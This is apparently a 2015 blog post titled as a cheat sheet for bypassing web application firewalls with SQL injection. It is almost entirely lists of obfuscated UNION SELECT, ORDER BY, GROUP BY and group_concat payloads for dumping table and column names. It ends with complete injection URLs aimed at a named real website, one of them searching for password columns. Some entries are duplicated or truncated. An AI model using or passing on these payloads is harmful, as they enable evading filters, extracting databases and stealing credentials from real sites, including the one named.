Saturday, April 25, 2015

byPassing Cheat Sheet Of ALL WAF



                                                  Cheat Sheet Of    UNION SELECT:::
This is The List of By Pass Union Select ::
----------------------------------------------------------------------------------------------------------------
  1. +union+distinct+select+
  2. +union+distinctROW+select+
  3. /**//*!12345UNION SELECT*//**/
  4. /**//*!50000UNION SELECT*//**/
  5. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  6. +/*!u%6eion*/+/*!se%6cect*/+
  7. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  8. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  9. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  10. union /*!50000%53elect*/
  11. %55nion %53elect
  12. +--+Union+--+Select+--+
  13. +UnIoN/*&a=*/SeLeCT/*&a=*/
  14. id=1+?UnI?On?+'SeL?ECT?
  15. id=1+'UnI'||'on'+SeLeCT'
  16. UnIoN SeLeCt CoNcAt(version())--
  17. uNiOn aLl sElEcT
  18. uUNIONnion all sSELECTelect 
  19. /*union*/union/*select*/select+1,2,3/*
  20. /*uniXon*/union/*selXect*/select+1,2/*
  21. un/**/ion+sel/**/ect
  22. +#1q%0Aunion all#qa%0A#%0Aselect
  23. union /*!select*/+
  24. union/**/select/**/
  25. /**/union/**/select/**/
  26. /**/union/*!50000select*/
  27. /**//*!12345UNION SELECT*//**/
  28. /**//*!50000UNION SELECT*//**/
  29. /**/uniUNIONon/**/selSELECTect/**/
  30. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  31. /**//*!union*//**//*!select*//**/
  32. /**/UNunionION/**/SELselectECT/**/
  33. /**//*UnIOn*//**//*SEleCt*//**/
  34. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  35. /**/UNunionION/**/all/**/SELselectECT/**/
  36. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  37. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  38. uni
  39. %20union%20/*!select*/%20
  40. union%23aa%0Aselect
  41. union+distinct+select+
  42. union+distinctROW+select+
  43. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  44. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  45. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  46. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  47. /*!u%6eion*/+/*!se%6cect*/+
  48. 1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  49. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  50. union /*!50000%53elect*/
  51. +%2F**/+Union/*!select*/
  52. %55nion %53elect
  53. +?+Union+?+Select+?+
  54. +UnIoN/*&a=*/SeLeCT/*&a=*/
  55. uNiOn aLl sElEcT
  56. uUNIONnion all sSELECTelect
  57. union(select(1),2,3)
  58. union (select 1111,2222,3333)
  59. union (/*!/**/ SeleCT */ 11)
  60. %0A%09UNION%0CSELECT%10NULL%
  61. /*!union*//*?*//*!all*//*?*//*!select*/
  62. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  63. union+sel%0bect
  64. +uni*on+sel*ect+
  65. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  66. union(select (1),(2),(3),(4),(5))
  67. UNION(SELECT(column)FROM(table))
  68. id=1+?UnI?On?+?SeL?ECT?
  69. id=1+?UnI?||?on?+SeLeCT?
  70. union select 1?+%0A,2?+%0A,3?+%0A etc ?
  71. /*!00000Union*/ /*!00000Select*/
  72. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  73. %55nion %53elect
  74. %55nion(%53elect 1,2,3)-- -
  75. +union+distinct+select+
  76. +union+distinctROW+select+
  77. /**//*!12345UNION SELECT*//**/
  78. /**//*!50000UNION SELECT*//**/
  79. /**/UNION/**//*!50000SELECT*//**/
  80. /*!50000UniON SeLeCt*/
  81. union /*!50000%53elect*/
  82. + #?uNiOn + #?sEleCt
  83. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  84. /*!%55NiOn*/ /*!%53eLEct*/
  85. /*!u%6eion*/ /*!se%6cect*/
  86. +un/**/ion+se/**/lect
  87. uni%0bon+se%0blect
  88. %2f**%2funion%2f**%2fselect
  89. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  90. REVERSE(noinu)+REVERSE(tceles)
  91. /*--*/union/*--*/select/*--*/
  92. union (/*!/**/ SeleCT */ 1,2,3)
  93. /*!union*/+/*!select*/
  94. union+/*!select*/
  95. /**/union/**/select/**/
  96. /**/uNIon/**/sEleCt/**/
  97. +%2F**/+Union/*!select*/
  98. /**//*!union*//**//*!select*//**/
  99. /*!uNIOn*/ /*!SelECt*/
  100. +union+distinct+select+
  101. +union+distinctROW+select+
  102. uNiOn aLl sElEcT
  103. UNIunionON+SELselectECT
  104. /**/union/*!50000select*//**/
  105. 0%a0union%a0select%09
  106. %0Aunion%0Aselect%0A
  107. %55nion/**/%53elect
  108. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  109. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  110. %0A%09UNION%0CSELECT%10NULL%
  111. /*!union*//*--*//*!all*//*--*//*!select*/
  112. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  113. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  114. +UnIoN/*&a=*/SeLeCT/*&a=*/
  115. union+sel%0bect
  116. +uni*on+sel*ect+
  117. +#1q%0Aunion all#qa%0A#%0Aselect
  118. union(select (1),(2),(3),(4),(5))
  119. UNION(SELECT(column)FROM(table))
  120. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  121. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  122. union(select(1),2,3)
  123. union (select 1111,2222,3333)
  124. uNioN (/*!/**/ SeleCT */ 11)
  125. union (select 1111,2222,3333)
  126. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  127. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  128. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  129. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  130. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  131. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  132. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  133. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  134. /union\sselect/g
  135. /union\s+select/i
  136. /*!UnIoN*/SeLeCT
  137. +UnIoN/*&a=*/SeLeCT/*&a=*/
  138. +uni>on+sel>ect+
  139. +(UnIoN)+(SelECT)+
  140. +(UnI)(oN)+(SeL)(EcT)
  141. +?UnI?On?+'SeL?ECT?
  142. +uni on+sel ect+
  143. +/*!UnIoN*/+/*!SeLeCt*/+
  144. /*!u%6eion*/ /*!se%6cect*/
  145. uni%20union%20/*!select*/%20
  146. union%23aa%0Aselect
  147. /**/union/*!50000select*/
  148. /^.*union.*$/ /^.*select.*$/
  149. /*union*/union/*select*/select+
  150. /*uni X on*/union/*sel X ect*/
  151. +un/**/ion+sel/**/ect+
  152. +UnIOn%0d%0aSeleCt%0d%0a
  153. UNION/*&test=1*/SELECT/*&pwn=2*/
  154. un?+un/**/ion+se/**/lect+
  155. +UNunionION+SEselectLECT+
  156. +uni%0bon+se%0blect+
  157. %252f%252a*/union%252f%252a /select%252f%252a*/
  158. /%2A%2A/union/%2A%2A/select/%2A%2A/
  159. %2f**%2funion%2f**%2fselect%2f**%2f
  160. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  161. /*!UnIoN*/SeLecT+
-----------------------------------------------------------------------------------------------------------------------
Union Select  by PASS with Url Encoded Method:
-----------------------------------------------------------------------------------------------------------------------
  1. %55nion(%53elect)
  2. union%20distinct%20select
  3. union%20%64istinctRO%57%20select
  4. union%2053elect
  5. %23?%0auion%20?%23?%0aselect
  6. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  7. %55nion %53eLEct
  8. u%6eion se%6cect
  9. unio%6e %73elect
  10. unio%6e%20%64istinc%74%20%73elect
  11. uni%6fn distinct%52OW s%65lect
  12. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

---------------------------------------------------------------------------------------------------------------------
Cheat Sheet of Bypassing Of Order by And Group By
---------------------------------------------------------------------------------------------------------------------

  1.  order by/**_**/
  2. /*!12345order*/ /*!12345by*/
  3. ) order by 1-- -
  4. ') order by 1-- -

  5. ')order by 1%23%23

  6. %')order by 1%23%23

  7. Null' order by 100--+

  8. Null' order by 9999--+

  9. ')group by 99-- -

  10. 'group by 119449-- -

  11. 'group/**/by/**/99%23%23
------------------------------------------------------------------------------------------------------------------------Concat And Group_concat By Pass cheat Sheet ::
------------------------------------------------------------------------------------------------------------------------


  1. /*!12345group_concat*/(/*!12345table_name*/)
  2. /*!50000group_concat*/(/*!50000table_name*/)
  3. /*!GrOuP_ConCaT*/()
  4. /*!12345GroUP_ConCat*/()
  5. /*!50000gRouP_cOnCaT*/()
  6. /*!50000Gr%6fuP_c%6fnCAT*/()
  7. /*!group_concat*/()
  8. gRoUp_cOnCAt()
  9. group_concat(/*!*/)
  10. group_concat(/*!12345table_name*/)
  11. group_concat(/*!50000table_name*/)
  12. /*!group_concat*/(/*!12345table_name*/)
  13. /*!group_concat*/(/*!50000table_name*/)
  14. unhex(hex(group_concat(table_name)))
  15. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  16. unhex(hex(/*!12345group_concat*/(table_name)))
  17. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  18. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  19. unhex(hex(/*!50000group_concat*/(table_name)))
  20. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  21. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  22. CONVERT(group_concat(table_name)+USING+latin1)
  23. CONVERT(group_concat(table_name)+USING+latin2)
  24. CONVERT(group_concat(table_name)+USING+latin3)
  25. CONVERT(group_concat(table_name)+USING+latin4)
  26. CONVERT(group_concat(table_name)+USING+latin5)
  27. convert(group_concat(table_name)+using+ascii)
  28. convert(group_concat(/*!table_name*/)+using+ascii)
  29. convert(group_concat(/*!12345table_name*/)+using+ascii)
  30. convert(group_concat(/*!50000table_name*/)+using+ascii)
  31. /*!concat_ws(0x3a,)*/
  32. concat_ws(0x3a3a3a,version()
  33. CONCAT_WS(CHAR(32,58,32),version(),)
----------------------------------------------------------------------------------------------------------------
How to By Pass Tables:::
---------------------------------------------------------------------------------------------------------------
group_concat(/*!table_name*/)

  1. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES? -

  2. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*//*!TaBle_ScHEmA*/=schEMA()? 
  3. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()? -
===========================================================
How to By Pass Columns:::
===========================================================
  1. group_concat(/*!column_name*/)
  2. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  3. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!froM*/ table? -


========================================================================
URL enCoded By passing Table and columns::
===========================================================

(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 ?

========================================================================
illegal mix of Collations ByPass ::
========================================================================
bypass method

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?

No comments:

Post a Comment